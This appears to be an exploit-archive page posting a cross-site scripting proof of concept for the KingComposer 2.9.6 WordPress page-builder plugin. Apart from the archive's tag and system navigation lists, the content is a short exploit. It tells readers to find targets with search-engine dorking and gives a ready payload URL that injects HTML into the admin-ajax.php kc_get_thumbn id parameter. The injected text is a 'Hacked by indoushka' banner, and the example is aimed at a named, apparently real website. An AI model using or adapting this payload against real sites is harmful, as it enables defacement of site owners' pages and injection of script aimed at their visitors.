Headline
WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting
WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.
WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting
Posted Jul 25, 2023
Authored by indoushka
WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.
tags | exploit, xss
SHA-256 | 13a1ca560e74613eb2d4517f0addb6da665a264ecdfd2a0a3388354bd3480ea9
Download | Favorite | View
WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting
====================================================================================================================================| # Title : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://kingcomposer.com/ | ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================
File Tags
- ActiveX (932)
- Advisory (81,749)
- Arbitrary (16,156)
- BBS (2,859)
- Bypass (1,735)
- CGI (1,025)
- Code Execution (7,240)
- Conference (679)
- Cracker (841)
- CSRF (3,335)
- DoS (23,366)
- Encryption (2,365)
- Exploit (51,659)
- File Inclusion (4,213)
- File Upload (967)
- Firewall (821)
- Info Disclosure (2,756)
- Intrusion Detection (891)
- Java (3,036)
- JavaScript (851)
- Kernel (6,644)
- Local (14,428)
- Magazine (586)
- Overflow (12,666)
- Perl (1,423)
- PHP (5,139)
- Proof of Concept (2,338)
- Protocol (3,583)
- Python (1,531)
- Remote (30,674)
- Root (3,576)
- Rootkit (508)
- Ruby (612)
- Scanner (1,638)
- Security Tool (7,877)
- Shell (3,177)
- Shellcode (1,212)
- Sniffer (894)
- Spoof (2,196)
- SQL Injection (16,312)
- TCP (2,397)
- Trojan (687)
- UDP (885)
- Virus (664)
- Vulnerability (31,716)
- Web (9,624)
- Whitepaper (3,748)
- x86 (961)
- XSS (17,879)
- Other
File Archives
- July 2023
- June 2023
- May 2023
- April 2023
- March 2023
- February 2023
- January 2023
- December 2022
- November 2022
- October 2022
- September 2022
- August 2022
- Older
Systems
- AIX (428)
- Apple (1,995)
- BSD (373)
- CentOS (57)
- Cisco (1,922)
- Debian (6,794)
- Fedora (1,691)
- FreeBSD (1,244)
- Gentoo (4,322)
- HPUX (879)
- iOS (349)
- iPhone (108)
- IRIX (220)
- Juniper (67)
- Linux (46,251)
- Mac OS X (685)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (484)
- RedHat (13,603)
- Slackware (941)
- Solaris (1,610)
- SUSE (1,444)
- Ubuntu (8,760)
- UNIX (9,270)
- UnixWare (186)
- Windows (6,565)
- Other